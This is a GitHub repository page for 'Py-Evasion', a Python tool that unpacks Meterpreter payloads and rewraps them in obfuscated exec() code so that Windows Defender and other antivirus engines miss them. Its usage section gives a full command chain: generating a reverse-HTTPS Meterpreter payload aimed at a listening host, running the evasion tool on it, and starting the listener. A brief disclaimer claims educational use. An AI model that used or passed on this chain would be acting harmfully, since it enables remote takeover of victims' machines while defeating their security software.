Skip to content

Pwn3rx0/Py-Evasion

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 

Repository files navigation

Py-Evasion

ideogram-v3 0_Cinematic_21_9_ultrawide_aggressive_cyberpunk_anime_style _A_lethal_digital_vipe-0

Description

A Python utility designed to extract, deobfuscate, and repackage Meterpreter payloads. This tool identifies encoded blobs (Zlib, Base64, or Hex) within a script, extracts the original source, and allows for the generation of a fresh, obfuscated wrapper to evade static analysis by Windows Defender and other AV engines.

Features

  • Recursive Decoding: Unpacks nested Base64, Zlib, and Hex layers automatically.
  • Evasion Mode-m evsaion: Wraps raw code in a Double Base64 inside exec() to mask signatures.
  • Clean Mode-m clean: Extracts raw source for analysis.

Installation

Clone the repository:

git clone https://github.com/Pwn3rx0/Py-Evasion.git
cd Py-Evasion

No external dependencies are required (uses standard Python libraries).

Usage

msfvenom -p python/meterpreter_reverse_https lhost=192.168.1.6 lport=4444 -o payload.py 
python3 PyEvasion.py -i payload.py -o evade.py -m evasion
msfconsole -r listener.rc

⚠️ Disclaimer

For educational and authorized security testing only. Misuse is illegal.

About

A compact Python utility to extract, deobfuscate, and repackage Meterpreter payloads to bypassing detection (e.g., Windows Defender).

Topics

Resources

Stars

Watchers

Forks

Contributors

Languages